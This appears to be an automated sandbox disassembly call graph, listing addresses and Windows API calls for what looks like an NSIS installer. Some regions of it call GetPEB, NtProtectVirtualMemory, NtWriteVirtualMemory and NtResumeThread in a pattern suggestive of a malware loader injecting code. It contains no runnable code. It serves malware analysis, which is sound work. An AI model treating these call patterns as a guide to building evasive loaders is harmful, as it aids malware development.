405bf3 CharNextW 20560->20569 20563 403c58 20561->20563 20564 403bd9 RegisterClassW 20561->20564 20562->20561 20567 40140b 2 API calls 20563->20567 20565 403c62 20564->20565 20566 403c0f SystemParametersInfoW CreateWindowExW 20564->20566 20565->20494 20566->20563 20572 403c5e 20567->20572 20570 403b69 lstrcmpiW 20568->20570 20571 403b8f 20568->20571 20573 403b58 20569->20573 20570->20571 20574 403b79 GetFileAttributesW 20570->20574 20575 405bc6 3 API calls 20571->20575 20572->20565 20577 403d31 19 API calls 20572->20577 20573->20568 20576 403b85 20574->20576 20578 403b95 20575->20578 20576->20571 20579 405c12 2 API calls 20576->20579 20580 403c6f 20577->20580 20691 406212 lstrcpynW 20578->20691 20579->20571 20582 403c7b ShowWindow 20580->20582 20583 403cfe 20580->20583 20585 40657c 3 API calls 20582->20585 20692 405444 MulDiv SendMessageW SendMessageW OleInitialize OleUninitialize 20583->20692 20587 403c93 20585->20587 20586 403d04 20588 403d20 20586->20588 20589 403d08 20586->20589 20590 403ca1 GetClassInfoW 20587->20590 20594 40657c 3 API calls 20587->20594 20593 40140b 2 API calls 20588->20593 20589->20565 20596 40140b 2 API calls 20589->20596 20591 403cb5 GetClassInfoW RegisterClassW 20590->20591 20592 403ccb DialogBoxParamW 20590->20592 20591->20592 20595 40140b 2 API calls 20592->20595 20593->20565 20594->20590 20595->20565 20596->20565 20597->20441 20598->20475 20599->20442 20600->20449 20601->20461 20602->20485 20603->20496 20604->20496 20606 405931 20605->20606 20607 405925 CloseHandle 20605->20607 20606->20496 20607->20606 20608->20494 20694 401389 20609->20694 20613 405e23 GetTickCount GetTempFileNameW 20612->20613 20614 403448 20613->20614 20615 405e59 20613->20615 20614->20431 20615->20613 20615->20614 20616->20513 20617->20515 20618->20519 20620 402e44 20619->20620 20621 402e5c 20619->20621 20624 402e54 20620->20624 20625 402e4d DestroyWindow 20620->20625 20622 402e64 20621->20622 20623 402e6c GetTickCount 20621->20623 20654 406628 DispatchMessageW PeekMessageW 20622->20654 20623->20624 20627 402e7a 20623->20627 20624->20525 20624->20540 20653 403402 SetFilePointer 20624->20653 20625->20624 20628 402e82 20627->20628 20629 402eaf CreateDialogParamW ShowWindow 20627->20629 20628->20624 20655 402e17 MulDiv 20628->20655 20629->20624 20631 402e90 wsprintfW 20632 405371 25 API calls 20631->20632 20633 402ead 20632->20633 20633->20624 20634->20537 20636 4031a6 20635->20636 20637 40318a SetFilePointer 20635->20637 20656 403283 GetTickCount 20636->20656 20637->20636 20640 403243 20640->20540 20643 403283 43 API calls 20644 4031dd 20643->20644 20644->20640 20645 403249 ReadFile 20644->20645 20647 4031ec 20644->20647 20645->20640 20647->20640 20648 405e6a ReadFile 20647->20648 20671 405e99 WriteFile 20647->20671 20648->20647 20651 405e6a ReadFile 20650->20651 20652 4033ff 20651->20652 20652->20538 20653->20529 20654->20624 20655->20631 20657 4032b1 20656->20657 20658 4033db 20656->20658 20673 403402 SetFilePointer 20657->20673 20659 402e33 33 API calls 20658->20659 20666 4031ad 20659->20666 20661 4032bc SetFilePointer 20663 4032e1 20661->20663 20662 4033ec ReadFile 20662->20663 20663->20662 20665 402e33 33 API calls 20663->20665 20663->20666 20667 405e99 WriteFile 20663->20667 20668 4033bc SetFilePointer 20663->20668 20674 40672b 20663->20674 20665->20663 20666->20640 20669 405e6a ReadFile 20666->20669 20667->20663 20668->20658 20670 4031c6 20669->20670 20670->20640 20670->20643 20672 405eb7 20671->20672 20672->20647 20673->20661 20675 406750 20674->20675 20676 406758 20674->20676 20675->20663 20676->20675 20677 4067e8 GlobalAlloc 20676->20677 20678 4067df GlobalFree 20676->20678 20679 406856 GlobalFree 20676->20679 20680 40685f GlobalAlloc 20676->20680 20677->20675 20677->20676 20678->20677 20679->20680 20680->20675 20680->20676 20681->20549 20683 403d45 20682->20683 20693 406159 wsprintfW 20683->20693 20685 403db6 20686 406234 18 API calls 20685->20686 20687 403dc2 SetWindowTextW 20686->20687 20688 403ae6 20687->20688 20689 403dde 20687->20689 20688->20554 20689->20688 20690 406234 18 API calls 20689->20690 20690->20689 20691->20556 20692->20586 20693->20685 20696 401390 20694->20696 20695 4013fe 20695->20454 20696->20695 20697 4013cb MulDiv SendMessageW 20696->20697 20697->20696 21361 402851 FindNextFileW lstrcpynW 20728 3326324 20729 33262f8 20728->20729 20729->20728 20730 332630b EnumWindows 20729->20730 20732 332628c 20729->20732 20730->20729 20730->20730 20733 33456d6 20732->20733 20734 3326286 EnumWindows GetPEB NtResumeThread 20732->20734 20734->20732 21470 402259 30 API calls 20744 402660 20745 402c31 18 API calls 20744->20745 20755 40266f 20745->20755 20746 4027ac 20747 4026b9 ReadFile 20747->20746 20747->20755 20748 402752 20748->20746 20748->20755 20758 405ec8 ReadFile WriteFile SetFilePointer SetFilePointer SetFilePointer 20748->20758 20749 405e6a ReadFile 20749->20755 20751 4026f9 MultiByteToWideChar 20751->20755 20752 4027ae 20759 406159 wsprintfW 20752->20759 20754 40271f SetFilePointer MultiByteToWideChar 20754->20755 20755->20746 20755->20747 20755->20748 20755->20749 20755->20751 20755->20752 20755->20754 20756 4027bf 20755->20756 20756->20746 20757 4027e0 SetFilePointer 20756->20757 20757->20746 20758->20748 20759->20746 21474 40166a 20 API calls 21365 404473 50 API calls 20936 401e77 20937 402c53 18 API calls 20936->20937 20938 401e7d 20937->20938 20939 402c53 18 API calls 20938->20939 20940 401e86 20939->20940 20941 402c53 18 API calls 20940->20941 20942 401e8f 20941->20942 20943 402c53 18 API calls 20942->20943 20944 401e98 20943->20944 20945 401423 25 API calls 20944->20945 20946 401e9f ShellExecuteW 20945->20946 20947 401ed0 20946->20947 21005 40167b 21006 402c53 18 API calls 21005->21006 21007 401682 21006->21007 21008 402c53 18 API calls 21007->21008 21009 40168b 21008->21009 21010 402c53 18 API calls 21009->21010 21011 401694 MoveFileW 21010->21011 21012 4016a0 21011->21012 21013 4016a7 21011->21013 21015 401423 25 API calls 21012->21015 21014 406555 2 API calls 21013->21014 21017 402250 21013->21017 21016 4016b6 21014->21016 21015->21017 21016->21017 21019 4060b3 38 API calls 21016->21019 21019->21012 21368 40287e 19 API calls 21369 401000 14 API calls 21096 402805 21097 40280c 21096->21097 21099 402a86 21096->21099 21098 402c31 18 API calls 21097->21098 21100 402813 21098->21100 21101 402822 SetFilePointer 21100->21101 21101->21099 21102 402832 21101->21102 21104 406159 wsprintfW 21102->21104 21104->21099 21485 1000164f GlobalFree VirtualFree GlobalFree 21375 10001058 7 API calls 21166 401c19 21167 402c31 18 API calls 21166->21167 21168 401c20 21167->21168 21169 402c31 18 API calls 21168->21169 21170 401c2d 21169->21170 21171 401c42 21170->21171 21173 402c53 18 API calls 21170->21173 21172 401c52 21171->21172 21174 402c53 18 API calls 21171->21174 21175 401ca9 21172->21175 21176 401c5d 21172->21176 21173->21171 21174->21172 21178 402c53 18 API calls 21175->21178 21177 402c31 18 API calls 21176->21177 21179 401c62 21177->21179 21180 401cae 21178->21180 21181 402c31 18 API calls 21179->21181 21182 402c53 18 API calls 21180->21182 21184 401c6e 21181->21184 21183 401cb7 FindWindowExW 21182->21183 21187 401cd9 21183->21187 21185 401c99 SendMessageW 21184->21185 21186 401c7b SendMessageTimeoutW 21184->21186 21185->21187 21186->21187 21487 403a19 GlobalAlloc 21378 404424 lstrlenW WideCharToMultiByte 21382 332cb5d GetPEB GetPEB 21491 401a30 20 API calls 21209 402032 21210 402044 21209->21210 21220 4020f6 21209->21220 21211 402c53 18 API calls 21210->21211 21212 40204b 21211->21212 21214 402c53 18 API calls 21212->21214 21213 401423 25 API calls 21215 402250 21213->21215 21216 402054 21214->21216 21217 40206a LoadLibraryExW 21216->21217 21218 40205c GetModuleHandleW 21216->21218 21219 40207b 21217->21219 21217->21220 21218->21217 21218->21219 21232 40665b WideCharToMultiByte 21219->21232 21220->21213 21223 4020c5 21225 405371 25 API calls 21223->21225 21224 40208c 21226 402094 21224->21226 21227 4020ab 21224->21227 21228 40209c 21225->21228 21229 401423 25 API calls 21226->21229 21235 10001759 21227->21235 21228->21215 21230 4020e8 FreeLibrary 21228->21230 21229->21228 21230->21215 21233 406685 GetProcAddress 21232->21233 21234 402086 21232->21234 21233->21234 21234->21223 21234->21224 21236 10001789 21235->21236 21277 10001b18 21236->21277 21238 10001790 21239 100018a6 21238->21239 21240 100017a1 21238->21240 21241 100017a8 21238->21241 21239->21228 21326 10002286 GlobalAlloc 21240->21326 21309 100022d0 21241->21309 21244 100017a7 21244->21241 21246 1000180c 21250 10001812 21246->21250 21251 1000184e 21246->21251 21247 100017ee 21329 100024a9 10 API calls 21247->21329 21248 100017d7 21260 100017cd 21248->21260 21328 10002b5f GlobalFree 21248->21328 21249 100017be 21253 100017c4 21249->21253 21259 100017cf 21249->21259 21332 100015b4 GlobalAlloc lstrcpyW wsprintfW 21250->21332 21334 100024a9 10 API calls 21251->21334 21253->21260 21320 100028a4 21253->21320 21258 100017f4 21330 100015b4 GlobalAlloc lstrcpyW wsprintfW 21258->21330 21327 10002645 GlobalAlloc GlobalSize 21259->21327 21260->21246 21260->21247 21262 10001828 21333 100024a9 10 API calls 21262->21333 21263 10001840 21269 10001895 21263->21269 21335 1000246c GlobalFree 21263->21335 21265 100017fa 21331 10001272 GlobalAlloc lstrcpynW 21265->21331 21266 100017d5 21266->21260 21269->21239 21271 1000189f GlobalFree 21269->21271 21270 10001800 GlobalFree 21270->21263 21271->21239 21273 10001861 21274 10001881 21273->21274 21275 1000187a FreeLibrary 21273->21275 21274->21269 21336 1000153d GlobalAlloc lstrcpynW wsprintfW 21274->21336 21275->21274 21337 1000121b GlobalAlloc 21277->21337 21279 10001b3c 21338 1000121b GlobalAlloc 21279->21338 21281 10001d7a GlobalFree GlobalFree GlobalFree 21283 10001d97 21281->21283 21299 10001de1 21281->21299 21282 10001b47 21282->21281 21284 10001c1d GlobalAlloc 21282->21284 21287 10001c86 GlobalFree 21282->21287 21290 10001c68 lstrcpyW 21282->21290 21292 10001c72 lstrcpyW 21282->21292 21295 10002048 21282->21295 21282->21299 21302 10001cc4 21282->21302 21304 10001f37 GlobalFree 21282->21304 21341 1000121b GlobalAlloc 21282->21341 21342 1000122c GlobalAlloc lstrcpynW 21282->21342 21285 100020ee 21283->21285 21293 10001dac 21283->21293 21283->21299 21284->21282 21286 10002110 GetModuleHandleW 21285->21286 21285->21299 21288 10002121 LoadLibraryW 21286->21288 21289 10002136 21286->21289 21287->21282 21288->21289 21288->21299 21343 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 21289->21343 21290->21292 21292->21282 21293->21299 21340 1000122c GlobalAlloc lstrcpynW 21293->21340 21294 10002188 21297 10002195 lstrlenW 21294->21297 21294->21299 21295->21299 21303 10002090 lstrcpyW 21295->21303 21344 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 21297->21344 21298 10002148 21298->21294 21308 10002172 GetProcAddress 21298->21308 21299->21238 21302->21282 21339 1000158f GlobalSize GlobalAlloc 21302->21339 21303->21299 21304->21282 21305 100021af 21305->21299 21308->21294 21316 100022e8 21309->21316 21310 1000122c GlobalAlloc lstrcpynW 21310->21316 21312 10002415 GlobalFree 21313 100017ae 21312->21313 21312->21316 21313->21248 21313->21249 21313->21260 21314 100023d3 lstrlenW 21314->21312 21319 100023de 21314->21319 21315 100023ba GlobalAlloc CLSIDFromString 21315->21312 21316->21310 21316->21312 21316->21314 21316->21315 21317 1000238f GlobalAlloc WideCharToMultiByte 21316->21317 21345 100012ba GlobalAlloc lstrcpynW 21316->21345 21317->21312 21319->21312 21346 100025d9 VirtualAlloc 21319->21346 21323 100028b6 21320->21323 21321 1000295b ReadFile 21322 10002979 21321->21322 21324 10002a75 21322->21324 21325 10002a6a GetLastError 21322->21325 21323->21321 21324->21260 21325->21324 21326->21244 21327->21266 21329->21258 21330->21265 21331->21270 21332->21262 21333->21263 21334->21263 21335->21273 21336->21269 21337->21279 21338->21282 21339->21302 21340->21299 21341->21282 21342->21282 21343->21298 21344->21305 21345->21316 21346->21319 21384 402837 FindClose 21493 10002a7f GlobalSize GlobalAlloc 21387 4028c3 55 API calls 21495 33281b4 EnumWindows GetPEB GetPEB NtResumeThread 21496 404ac7 6 API calls 21497 4016cc 22 API calls 20708 401ed5 20709 402c53 18 API calls 20708->20709 20710 401edb 20709->20710 20711 405371 25 API calls 20710->20711 20712 401ee5 20711->20712 20713 4058f2 2 API calls 20712->20713 20714 401eeb 20713->20714 20715 401f4a CloseHandle 20714->20715 20716 401efb WaitForSingleObject 20714->20716 20719 4028a1 20714->20719 20715->20719 20717 401f0d 20716->20717 20718 401f1f GetExitCodeProcess 20717->20718 20726 406628 DispatchMessageW PeekMessageW 20717->20726 20721 401f31 20718->20721 20722 401f3e 20718->20722 20727 406159 wsprintfW 20721->20727 20722->20715 20725 401f3c 20722->20725 20723 401f14 WaitForSingleObject 20723->20717 20725->20715 20726->20723 20727->20725 21391 4014d7 19 API calls 21392 40675e GlobalFree GlobalAlloc GlobalFree GlobalAlloc 20760 4052e5 20761 4052f5 20760->20761 20762 405309 20760->20762 20763 405352 20761->20763 20764 4052fb 20761->20764 20765 405311 IsWindowVisible 20762->20765 20772 405331 20762->20772 20766 405357 CallWindowProcW 20763->20766 20774 404322 20764->20774 20765->20763 20768 40531e 20765->20768 20769 405305 20766->20769 20777 404c3b SendMessageW GetMessagePos ScreenToClient SendMessageW SendMessageW 20768->20777 20771 405328 20771->20772 20772->20766 20778 404cbb MulDiv SendMessageW wsprintfW lstrcpynW 20772->20778 20775 40433a 20774->20775 20776 40432b SendMessageW 20774->20776 20775->20769 20776->20775 20777->20771 20778->20763 21393 100018a9 GlobalAlloc lstrcpynW GlobalFree GlobalFree GlobalFree 20799 404ced GetDlgItem GetDlgItem 20800 404d3f 7 API calls 20799->20800 20803 404f58 20799->20803 20801 404de2 DeleteObject 20800->20801 20802 404dd5 SendMessageW 20800->20802 20804 404deb 20801->20804 20802->20801 20807 40501d 20803->20807 20813 404fb8 20803->20813 20822 40503c 20803->20822 20805 404e22 20804->20805 20806 406234 18 API calls 20804->20806 20854 4042d6 20805->20854 20810 404e04 SendMessageW SendMessageW 20806->20810 20817 40502e SendMessageW 20807->20817 20807->20822 20809 4050e8 20811 4050f2 SendMessageW 20809->20811 20812 4050fa 20809->20812 20810->20804 20811->20812 20823 405113 20812->20823 20824 40510c ImageList_Destroy 20812->20824 20830 405123 20812->20830 20859 404c3b SendMessageW GetMessagePos ScreenToClient SendMessageW SendMessageW 20813->20859 20814 404e36 20819 4042d6 19 API calls 20814->20819 20815 4052d0 20862 40433d 8 API calls 20815->20862 20817->20822 20836 404e44 20819->20836 20820 405095 SendMessageW 20820->20815 20826 4050aa SendMessageW 20820->20826 20821 4052de 20822->20809 20822->20815 20822->20820 20828 40511c GlobalFree 20823->20828 20823->20830 20824->20823 20825 405292 20825->20815 20831 4052a4 ShowWindow GetDlgItem ShowWindow 20825->20831 20827 4050bd 20826->20827 20838 4050ce SendMessageW 20827->20838 20828->20830 20829 404f19 GetWindowLongW SetWindowLongW 20832 404f32 20829->20832 20830->20825 20849 40515e 20830->20849 20860 404cbb MulDiv SendMessageW wsprintfW lstrcpynW 20830->20860 20831->20815 20833 404f50 20832->20833 20834 404f38 ShowWindow 20832->20834 20858 40430b SendMessageW 20833->20858 20857 40430b SendMessageW 20834->20857 20835 404fc9 20835->20807 20836->20829 20837 404e94 SendMessageW 20836->20837 20839 404f13 20836->20839 20842 404ed0 SendMessageW 20836->20842 20843 404ee1 SendMessageW 20836->20843 20837->20836 20838->20809 20839->20829 20839->20832 20842->20836 20843->20836 20845 404f4b 20845->20815 20846 405268 InvalidateRect 20846->20825 20847 40527e 20846->20847 20861 404bf6 21 API calls 20847->20861 20848 40518c SendMessageW 20850 4051a2 20848->20850 20849->20848 20849->20850 20850->20846 20852 405203 20850->20852 20853 405216 SendMessageW SendMessageW 20850->20853 20852->20853 20853->20850 20855 406234 18 API calls 20854->20855 20856 4042e1 SetDlgItemTextW 20855->20856 20856->20814 20857->20845 20858->20803 20859->20835 20860->20849 20861->20825 20862->20821 21394 401a20 19 API calls 21396 10001b59 22 API calls 21397 4014f5 SetForegroundWindow 21504 100016b6 30 API calls 21401 401491 25 API calls 21191 40249d 21192 402d5d 19 API calls 21191->21192 21193 4024a7 21192->21193 21194 402c53 18 API calls 21193->21194 21195 4024b0 21194->21195 21196 4024bb RegQueryValueExW 21195->21196 21200 4028a1 21195->21200 21197 4024e1 RegCloseKey 21196->21197 21198 4024db 21196->21198 21197->21200 21198->21197 21202 406159 wsprintfW 21198->21202 21202->21197 21403 40149e PostQuitMessage 21404 100010e1 9 API calls 21409 4054b0 72 API calls 21518 402ab6 SendMessageW InvalidateRect 21410 4014b8 MulDiv SendMessageW 20214 401941 20215 401943 20214->20215 20220 402c53 20215->20220 20221 402c5f 20220->20221 20265 406234 20221->20265 20224 401948 20226 405a03 20224->20226 20304 405cce 20226->20304 20229 405a42 20232 405b62 20229->20232 20318 406212 lstrcpynW 20229->20318 20230 405a2b DeleteFileW 20231 401951 20230->20231 20232->20231 20337 406555 FindFirstFileW 20232->20337 20234 405a68 20235 405a7b 20234->20235 20236 405a6e lstrcatW 20234->20236 20319 405c12 lstrlenW 20235->20319 20237 405a81 20236->20237 20240 405a91 lstrcatW 20237->20240 20242 405a9c lstrlenW FindFirstFileW 20237->20242 20240->20242 20242->20232 20250 405abe 20242->20250 20243 405b8b 20340 405bc6 lstrlenW CharPrevW 20243->20340 20246 405b45 FindNextFileW 20246->20250 20251 405b5b FindClose 20246->20251 20249 405b9d 20252 405ba1 20249->20252 20253 405bb7 20249->20253 20250->20246 20260 405b06 20250->20260 20323 406212 lstrcpynW 20250->20323 20251->20232 20252->20231 20256 405371 25 API calls 20252->20256 20255 405371 25 API calls 20253->20255 20255->20231 20258 405bae 20256->20258 20257 405a03 62 API calls 20257->20260 20344 4060b3 38 API calls 20258->20344 20260->20246 20260->20257 20261 405371 25 API calls 20260->20261 20324 4059bb RemoveDirectoryW DeleteFileW SetFileAttributesW GetFileAttributesW SetFileAttributesW 20260->20324 20325 405371 20260->20325 20336 4060b3 38 API calls 20260->20336 20261->20246 20262 405bb5 20262->20231 20271 406241 20265->20271 20266 40648c 20267 402c80 20266->20267 20299 406212 lstrcpynW 20266->20299 20267->20224 20283 4064a6 20267->20283 20269 4062f4 GetVersion 20269->20271 20270 40645a lstrlenW 20270->20271 20271->20266 20271->20269 20271->20270 20272 406234 10 API calls 20271->20272 20275 40636f GetSystemDirectoryW 20271->20275 20277 406382 GetWindowsDirectoryW 20271->20277 20278 4064a6 5 API calls 20271->20278 20279 406234 10 API calls 20271->20279 20280 4063fb lstrcatW 20271->20280 20281 4063b6 SHGetSpecialFolderLocation 20271->20281 20292 4060df RegOpenKeyExW 20271->20292 20297 406159 wsprintfW 20271->20297 20298 406212 lstrcpynW 20271->20298 20272->20270 20275->20271 20277->20271 20278->20271 20279->20271 20280->20271 20281->20271 20282 4063ce SHGetPathFromIDListW CoTaskMemFree 20281->20282 20282->20271 20289 4064b3 20283->20289 20284 406529 20285 40652e CharPrevW 20284->20285 20287 40654f 20284->20287 20285->20284 20286 40651c CharNextW 20286->20284 20286->20289 20287->20224 20289->20284 20289->20286 20290 406508 CharNextW 20289->20290 20291 406517 CharNextW 20289->20291 20300 405bf3 20289->20300 20290->20289 20291->20286 20293 406153 20292->20293 20294 406113 RegQueryValueExW 20292->20294 20293->20271 20296 406134 RegCloseKey 20294->20296 20296->20293 20297->20271 20298->20271 20299->20267 20301 405bf9 20300->20301 20302 405c0f 20301->20302 20303 405c00 CharNextW 20301->20303 20302->20289 20303->20301 20345 406212 lstrcpynW 20304->20345 20306 405cdf 20346 405c71 CharNextW CharNextW 20306->20346 20309 405a23 20309->20229 20309->20230 20310 4064a6 5 API calls 20316 405cf5 20310->20316 20311 405d26 lstrlenW 20312 405d31 20311->20312 20311->20316 20313 405bc6 3 API calls 20312->20313 20315 405d36 GetFileAttributesW 20313->20315 20314 406555 2 API calls 20314->20316 20315->20309 20316->20309 20316->20311 20316->20314 20317 405c12 2 API calls 20316->20317 20317->20311 20318->20234 20320 405c20 20319->20320 20321 405c32 20320->20321 20322 405c26 CharPrevW 20320->20322 20321->20237 20322->20320 20322->20321 20323->20250 20324->20260 20326 40538c 20325->20326 20327 40542e 20325->20327 20328 4053a8 lstrlenW 20326->20328 20331 406234 18 API calls 20326->20331 20327->20260 20329 4053d1 20328->20329 20330 4053b6 lstrlenW 20328->20330 20333 4053e4 20329->20333 20334 4053d7 SetWindowTextW 20329->20334 20330->20327 20332 4053c8 lstrcatW 20330->20332 20331->20328 20332->20329 20333->20327 20335 4053ea SendMessageW SendMessageW SendMessageW 20333->20335 20334->20333 20335->20327 20336->20260 20338 405b87 20337->20338 20339 40656b FindClose 20337->20339 20338->20231 20338->20243 20339->20338 20341 405be2 lstrcatW 20340->20341 20342 405b91 20340->20342 20341->20342 20343 4059bb RemoveDirectoryW DeleteFileW SetFileAttributesW GetFileAttributesW SetFileAttributesW 20342->20343 20343->20249 20344->20262 20345->20306 20347 405c8e 20346->20347 20351 405ca0 20346->20351 20348 405c9b CharNextW 20347->20348 20347->20351 20349 405cc4 20348->20349 20349->20309 20349->20310 20350 405bf3 CharNextW 20350->20351 20351->20349 20351->20350 21521 401b4d 19 API calls 20700 40234e 20701 402c53 18 API calls 20700->20701 20702 40235d 20701->20702 20703 402c53 18 API calls 20702->20703 20704 402366 20703->20704 20705 402c53 18 API calls 20704->20705 20706 402370 GetPrivateProfileStringW 20705->20706 21417 401956 19 API calls 20738 40175c 20739 402c53 18 API calls 20738->20739 20740 401763 20739->20740 20741 405e16 2 API calls 20740->20741 20742 40176a 20741->20742 20743 405e16 2 API calls 20742->20743 20743->20742 21523 332cc2d GetPEB 21420 401563 wsprintfW 21422 401968 20 API calls 20864 40176f 20865 402c53 18 API calls 20864->20865 20866 401776 20865->20866 20867 401796 20866->20867 20868 40179e 20866->20868 20906 406212 lstrcpynW 20867->20906 20907 406212 lstrcpynW 20868->20907 20871 40179c 20875 4064a6 5 API calls 20871->20875 20872 4017a9 20873 405bc6 3 API calls 20872->20873 20874 4017af lstrcatW 20873->20874 20874->20871 20891 4017bb 20875->20891 20876 406555 2 API calls 20876->20891 20879 4017cd CompareFileTime 20879->20891 20880 40188d 20882 405371 25 API calls 20880->20882 20881 401864 20883 405371 25 API calls 20881->20883 20900 401879 20881->20900 20884 401897 20882->20884 20883->20900 20885 40317b 45 API calls 20884->20885 20886 4018aa 20885->20886 20888 4018be SetFileTime 20886->20888 20889 4018d0 CloseHandle 20886->20889 20887 406212 lstrcpynW 20887->20891 20888->20889 20892 4018e1 20889->20892 20889->20900 20890 406234 18 API calls 20890->20891 20891->20876 20891->20879 20891->20880 20891->20881 20891->20887 20891->20890 20902 405dc2 GetFileAttributesW 20891->20902 20905 405de7 GetFileAttributesW CreateFileW 20891->20905 20908 405957 MessageBoxIndirectW 20891->20908 20893 4018e6 20892->20893 20894 4018f9 20892->20894 20895 406234 18 API calls 20893->20895 20896 406234 18 API calls 20894->20896 20898 4018ee lstrcatW 20895->20898 20899 401901 20896->20899 20898->20899 20899->20900 20909 405957 MessageBoxIndirectW 20899->20909 20903 405de1 20902->20903 20904 405dd4 SetFileAttributesW 20902->20904 20903->20891 20904->20903 20905->20891 20906->20871 20907->20872 20908->20891 20909->20900 20911 401b71 20912 401bc2 20911->20912 20913 401b7e 20911->20913 20914 401bc7 20912->20914 20915 401bec GlobalAlloc 20912->20915 20916 401c07 20913->20916 20921 401b95 20913->20921 20924 4022f7 20914->20924 20932 406212 lstrcpynW 20914->20932 20918 406234 18 API calls 20915->20918 20917 406234 18 API calls 20916->20917 20916->20924 20920 4022f1 20917->20920 20918->20916 20920->20924 20933 405957 MessageBoxIndirectW 20920->20933 20930 406212 lstrcpynW 20921->20930 20922 401bd9 GlobalFree 20922->20924 20926 401ba4 20931 406212 lstrcpynW 20926->20931 20928 401bb3 20934 406212 lstrcpynW 20928->20934 20930->20926 20931->20928 20932->20922 20933->20924 20934->20924 21528 404771 63 API calls 21425 401573 ShowWindow ShowWindow 21529 3320001 EnumWindows GetPEB NtResumeThread 20949 3326208 20956 33429d7 20949->20956 20951 3326214 20988 3340888 20951->20988 20954 332628e 20955 33456d6 20954->20955 20992 3326286 EnumWindows GetPEB NtResumeThread 20954->20992 20957 3340888 3 API calls 20956->20957 20958 33429e6 20957->20958 20959 3340888 3 API calls 20958->20959 20960 33429fc 20959->20960 20961 3342a05 GetPEB 20960->20961 20962 3342ac5 20961->20962 20995 3343960 20962->20995 20964 33433ee 20964->20951 20965 3342b05 20965->20964 20966 33433f1 20965->20966 20971 3342f9b 20965->20971 20987 332ed8e 20965->20987 20968 3343731 20966->20968 20970 3343463 20966->20970 20967 3343960 NtProtectVirtualMemory 20969 334395b 20967->20969 20974 3343849 20968->20974 20980 33264c0 20968->20980 20969->20951 20976 3343726 20970->20976 20983 3326402 20970->20983 20971->20971 20972 3343960 NtProtectVirtualMemory 20971->20972 20972->20964 20974->20967 20975 332dba1 GetPEB 20975->20980 20978 3343960 NtProtectVirtualMemory 20976->20978 20979 334372c 20978->20979 20979->20951 20980->20975 20981 3340888 20980->20981 20986 332e08f 20980->20986 20993 334499c 20980->20993 20999 3326402 EnumWindows GetPEB NtResumeThread 20980->20999 20985 3340904 20981->20985 20998 33264c0 EnumWindows GetPEB NtResumeThread 20981->20998 20983->20983 20983->20986 20997 3326286 EnumWindows GetPEB NtResumeThread 20983->20997 20985->20951 20986->20951 20987->20980 20987->20981 20987->20983 20987->20986 20989 33408f7 20988->20989 20991 3340904 20988->20991 21004 33264c0 EnumWindows GetPEB NtResumeThread 20989->21004 20991->20954 20992->20954 21000 33449a1 20993->21000 20996 33439ef NtProtectVirtualMemory 20995->20996 20996->20965 20997->20983 20998->20985 20999->20980 21001 3344a12 21000->21001 21002 3344bf4 NtResumeThread 21001->21002 21003 3344c7d 21002->21003 21004->20991 21428 401503 18 API calls 21429 402104 26 API calls 21109 40190c 69 API calls 21110 40230c 21111 402314 21110->21111 21114 40231a 21110->21114 21112 402c53 18 API calls 21111->21112 21112->21114 21113 402328 21116 402336 21113->21116 21117 402c53 18 API calls 21113->21117 21114->21113 21115 402c53 18 API calls 21114->21115 21115->21113 21118 402c53 18 API calls 21116->21118 21117->21116 21119 40233f WritePrivateProfileStringW 21118->21119 21121 3330a7d 21122 3330b0f NtWriteVirtualMemory 21121->21122 21124 3330a73 21121->21124 21123 3330b29 21122->21123 21124->21121 21124->21122 21124->21123 21432 401d0e 19 API calls 21433 40190f 19 API calls 21153 402511 21154 402d5d 19 API calls 21153->21154 21155 40251b 21154->21155 21156 402c31 18 API calls 21155->21156 21157 402524 21156->21157 21158 402540 RegEnumKeyW 21157->21158 21159 40254c RegEnumValueW 21157->21159 21160 4028a1 21157->21160 21161 402565 RegCloseKey 21158->21161 21159->21160 21159->21161 21161->21160 21538 40472a 28 API calls 21443 401d33 19 API calls 21355 401735 21356 402c53 18 API calls 21355->21356 21357 40173c SearchPathW 21356->21357 21358 401757 21357->21358 21541 3329844 NtResumeThread 21446 3327297 EnumWindows GetPEB GetPEB GetPEB NtResumeThread 20352 4015c1 20353 402c53 18 API calls 20352->20353 20354 4015c8 20353->20354 20355 405c71 4 API calls 20354->20355 20361 4015d1 20355->20361 20356 401631 20358 401663 20356->20358 20359 401636 20356->20359 20357 405bf3 CharNextW 20357->20361 20363 401423 25 API calls 20358->20363 20379 401423 20359->20379 20361->20356 20361->20357 20368 401617 GetFileAttributesW 20361->20368 20371 4058da 20361->20371 20374 405840 CreateDirectoryW 20361->20374 20383 4058bd CreateDirectoryW 20361->20383 20369 40165b 20363->20369 20367 40164a SetCurrentDirectoryW 20367->20369 20368->20361 20386 4065ec GetModuleHandleA 20371->20386 20375 405891 GetLastError 20374->20375 20376 40588d 20374->20376 20375->20376 20377 4058a0 SetFileSecurityW 20375->20377 20376->20361 20377->20376 20378 4058b6 GetLastError 20377->20378 20378->20376 20380 405371 25 API calls 20379->20380 20381 401431 20380->20381 20382 406212 lstrcpynW 20381->20382 20382->20367 20384 4058d1 GetLastError 20383->20384 20385 4058cd 20383->20385 20384->20385 20385->20361 20387 406612 GetProcAddress 20386->20387 20388 406608 20386->20388 20390 4058e1 20387->20390 20392 40657c GetSystemDirectoryW 20388->20392 20390->20361 20391 40660e 20391->20387 20391->20390 20393 40659e wsprintfW LoadLibraryExW 20392->20393 20393->20391 20407 3326286 EnumWindows EnumWindows GetPEB NtResumeThread 20408 332920e EnumWindows GetPEB NtResumeThread 20707 33264bc EnumWindows GetPEB GetPEB NtResumeThread 20780 4023ea 20781 4023f0 20780->20781 20782 402c53 18 API calls 20781->20782 20783 402402 20782->20783 20784 402c53 18 API calls 20783->20784 20785 40240c RegCreateKeyExW 20784->20785 20786 402436 20785->20786 20787 4028a1 20785->20787 20788 402451 20786->20788 20790 402c53 18 API calls 20786->20790 20789 40245d 20788->20789 20791 402c31 18 API calls 20788->20791 20792 40247c RegSetValueExW 20789->20792 20794 40317b 45 API calls 20789->20794 20793 402447 lstrlenW 20790->20793 20791->20789 20795 402492 RegCloseKey 20792->20795 20793->20788 20794->20792 20795->20787 21549 4043ea lstrcpynW lstrlenW 21020 403dfe 21021 403f51 21020->21021 21022 403e16 21020->21022 21024 403f62 GetDlgItem GetDlgItem 21021->21024 21025 403fa2 21021->21025 21022->21021 21023 403e22 21022->21023 21026 403e40 21023->21026 21027 403e2d SetWindowPos 21023->21027 21028 4042d6 19 API calls 21024->21028 21029 403ffc 21025->21029 21038 401389 2 API calls 21025->21038 21031 403e45 ShowWindow 